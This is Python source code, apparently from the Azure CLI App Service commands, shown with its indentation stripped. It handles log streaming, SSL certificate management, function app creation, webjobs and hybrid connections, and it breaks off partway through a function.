def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import certifi
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
# Extra encode() and decode for stdout which does not surpport 'utf-8'
print(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace'), end='') # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
cert_file = open(certificate_file, 'rb')
cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file '''
p12 = OpenSSL.crypto.load_pkcs12(open(certificate_file, 'rb').read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
server_farm_id = webapp.server_farm_id
location = webapp.location
kv_id = _format_key_vault_id(cmd.cli_ctx, key_vault, resource_group_name)
kv_id_parts = parse_resource_id(kv_id)
kv_name = kv_id_parts['name']
kv_resource_group_name = kv_id_parts['resource_group']
kv_subscription = kv_id_parts['subscription']
cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
lnk_msg = 'Find more details here: {}'.format(lnk)
if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
logger.warning('Unable to verify Key Vault permissions.')
logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
logger.warning(lnk_msg)
kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
key_vault_secret_name=key_vault_certificate_name, server_farm_id=server_farm_id)
return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
certificate_envelope=kv_cert_def)
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
Certificate = cmd.get_models('Certificate')
hostname = hostname.lower()
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
slot_text = "Deployment slot {} in ".format(slot) if slot else ''
raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name))
parsed_plan_id = parse_resource_id(webapp.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
if plan_info.sku.tier.upper() == 'FREE' or plan_info.sku.tier.upper() == 'SHARED':
raise CLIError('Managed Certificate is not supported on Free and Shared tier.')
if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
slot_text = " --slot {}".format(slot) if slot else ""
raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
"Use 'az webapp config hostname add --resource-group {2} "
"--webapp-name {1}{3} --hostname {0}' "
"to register the hostname.".format(hostname, name, resource_group_name, slot_text))
server_farm_id = webapp.server_farm_id
location = webapp.location
easy_cert_def = Certificate(location=location, canonical_name=hostname,
server_farm_id=server_farm_id, password='')
return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
certificate_envelope=easy_cert_def)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
from azure.cli.command_modules.keyvault._client_factory import keyvault_client_vaults_factory
from azure.cli.command_modules.role._client_factory import _graph_client_factory
from azure.graphrbac.models import GraphErrorException
from azure.cli.core.commands.client_factory import get_subscription_id
subscription = get_subscription_id(cmd.cli_ctx)
# Cannot check if key vault is in another subscription
if subscription != key_vault_subscription:
return False
kv_client = keyvault_client_vaults_factory(cmd.cli_ctx, None)
vault = kv_client.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
# Check for Microsoft.Azure.WebSites app registration
AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
for policy in vault.properties.access_policies:
try:
sp = graph_sp_client.get(policy.object_id)
if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
for perm in policy.permissions.secrets:
if perm == "Get":
return True
except GraphErrorException:
pass # Lookup will fail for non service principals (users, groups, etc.)
return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
host_name, ssl_state, thumbprint, slot=None):
Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=webapp.location, tags=webapp.tags)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
if len(webapp_cert.host_names) == 1 and not webapp_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
webapp_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(webapp_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise CLIError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# help class handles runtime stack in format like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper(object):
def __init__(self, cmd, client, linux=False):
self._cmd = cmd
self._client = client
self._linux = linux
self._stacks = []
def resolve(self, display_name):
self._load_stacks()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks()
return self._stacks
@staticmethod
def update_site_config(stack, site_config, cmd=None):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(cmd, stack, site_config):
NameValuePair = cmd.get_models('NameValuePair')
if site_config.app_settings is None:
site_config.app_settings = []
site_config.app_settings += [NameValuePair(name=k, value=v) for k, v in stack['configs'].items()]
return site_config
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
# get all stack version except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku,
number_of_workers=None, max_burst=None, location=None, tags=None):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
tier = get_sku_name(sku)
if max_burst is not None:
if tier.lower() != "elasticpremium":
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count',
number_of_workers, min_val=0, max_val=20)
client = web_client_factory(cmd.cli_ctx)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
hyper_v=None, name=name)
return client.app_service_plans.create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier.lower() == 'dynamic'
return False
def is_plan_elastic_premium(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def validate_and_convert_to_int(flag, val):
try:
return int(val)
except ValueError:
raise CLIError("Usage error: {} is expected to have an int value.".format(flag))
def validate_range_of_int_flag(flag_name, value, min_val, max_val):
value = validate_and_convert_to_int(flag_name, value)
if min_val > value or value > max_val:
raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name, min_val,
max_val))
return value
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, functions_version=None, runtime=None, runtime_version=None,
consumption_plan_location=None, app_insights=None, app_insights_key=None,
disable_app_insights=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
docker_registry_server_password=None, docker_registry_server_user=None,
deployment_container_image_name=None, tags=None):
# pylint: disable=too-many-statements, too-many-branches
if functions_version is None:
logger.warning("No functions version specified so defaulting to 2. In the future, specifying a version will "
"be required. To create a 2.x function you would pass in the flag `--functions-version 2`")
functions_version = '2'
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
SiteConfig, Site, NameValuePair = cmd.get_models('SiteConfig', 'Site', 'NameValuePair')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
site_config = SiteConfig(app_settings=[])
functionapp_def = Site(location=None, site_config=site_config, tags=tags)
client = web_client_factory(cmd.cli_ctx)
plan_info = None
if runtime is not None:
runtime = runtime.lower()
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((l for l in locations if l['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = os_type and os_type.lower() == 'linux'
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
raise CLIError(
"usage error: --runtime RUNTIME required for linux functions apps without custom image.")
if runtime:
if is_linux and runtime not in LINUX_RUNTIMES:
raise CLIError("usage error: Currently supported runtimes (--runtime) in linux function apps are: {}."
.format(', '.join(LINUX_RUNTIMES)))
if not is_linux and runtime not in WINDOWS_RUNTIMES:
raise CLIError("usage error: Currently supported runtimes (--runtime) in windows function apps are: {}."
.format(', '.join(WINDOWS_RUNTIMES)))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_WORKER_RUNTIME', value=runtime))
if runtime_version is not None:
if runtime is None:
raise CLIError('Must specify --runtime to use --runtime-version')
allowed_versions = FUNCTIONS_VERSION_TO_SUPPORTED_RUNTIME_VERSIONS[functions_version][runtime]
if runtime_version not in allowed_versions:
raise CLIError('--runtime-version {} is not supported for the selected --runtime {} and '
'--functions_version {}. Supported versions are: {}'
.format(runtime_version, runtime, functions_version, ', '.join(allowed_versions)))
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
is_consumption = consumption_plan_location is not None
if not is_consumption:
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
if runtime not in FUNCTIONS_VERSION_TO_SUPPORTED_RUNTIME_VERSIONS[functions_version]:
raise CLIError("An appropriate linux image for runtime:'{}', "
"functions_version: '{}' was not found".format(runtime, functions_version))
if deployment_container_image_name is None:
site_config.linux_fx_version = _get_linux_fx_functionapp(functions_version, runtime, runtime_version)
else:
functionapp_def.kind = 'functionapp'
# adding appsetting to site to make it a function
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
value=_get_extension_version_functionapp(functions_version)))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_NODE_DEFAULT_VERSION',
value=_get_website_node_version_functionapp(functions_version,
runtime,
runtime_version)))
# If plan is not consumption or elastic premium, we need to set always on
if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
site_config.always_on = True
# If plan is elastic premium or windows consumption, we need these app settings
is_windows_consumption = consumption_plan_location is not None and not is_linux
if is_plan_elastic_premium(cmd, plan_info) or is_windows_consumption:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=name.lower()))
create_app_insights = False
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
elif not disable_app_insights:
create_app_insights = True
poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully "
"created but is not active until content is published using "
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
if create_app_insights:
try:
try_create_application_insights(cmd, functionapp)
except Exception: # pylint: disable=broad-except
logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
'Please use the Azure Portal to create and configure the Application Insights, if needed.')
if deployment_container_image_name:
update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password)
return functionapp
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
return '~{}'.format(functions_version)
return '~2'
def _get_linux_fx_functionapp(functions_version, runtime, runtime_version):
if runtime == 'dotnet':
return runtime.upper()
if runtime_version is None:
runtime_version = FUNCTIONS_VERSION_TO_DEFAULT_RUNTIME_VERSION[functions_version][runtime]
return '{}|{}'.format(runtime.upper(), runtime_version)
def _get_website_node_version_functionapp(functions_version, runtime, runtime_version):
if runtime is None or runtime != 'node':
return FUNCTIONS_VERSION_TO_DEFAULT_NODE_VERSION[functions_version]
if runtime_version is not None:
return '~{}'.format(runtime_version)
return FUNCTIONS_VERSION_TO_DEFAULT_NODE_VERSION[functions_version]
def try_create_application_insights(cmd, functionapp):
creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
'Please use the Azure Portal to manually create and configure the Application Insights, ' \
'if needed.'
ai_resource_group_name = functionapp.resource_group
ai_name = functionapp.name
ai_location = functionapp.location
app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
ai_properties = {
"name": ai_name,
"location": ai_location,
"kind": "web",
"properties": {
"Application_Type": "web"
}
}
appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
if appinsights is None or appinsights.instrumentation_key is None:
logger.warning(creation_failed_warn)
return
# We make this success message as a warning to no interfere with regular JSON output in stdout
logger.warning('Application Insights \"%s\" was created for this Function App. '
'You can visit https://portal.azure.com/#resource%s/overview to view your '
'Application Insights component', appinsights.name, appinsights.id)
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name
allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_name(sku)
return client.list_geo_regions(full_sku, linux_workers_enabled)
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
import requests
from azure.cli.core.util import should_disable_connection_verify
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization,
verify=not should_disable_connection_verify())
time.sleep(2)
try:
res_dict = response.json()
except json.decoder.JSONDecodeError:
logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
res_dict = {}
finally:
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Zip deployment failed. {}. Please run the command az webapp log tail
-n {} -g {}""".format(res_dict, name, rg_name))
if res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Timeout reached by the command, however, the deployment operation
is still on-going. Navigate to your scm site to check the deployment status""")
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
else:
listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
HybridConnection = cmd.get_models('HybridConnection')
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
hy_co_id = ''
for n in namespace_client.list():
if n.name == namespace:
hy_co_id = n.id
i = 0
hy_co_resource_group = ''
hy_co_split = hy_co_id.split("/")
for z in hy_co_split:
if z == "resourceGroups":
hy_co_resource_group = hy_co_split[i + 1]
i = i + 1
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
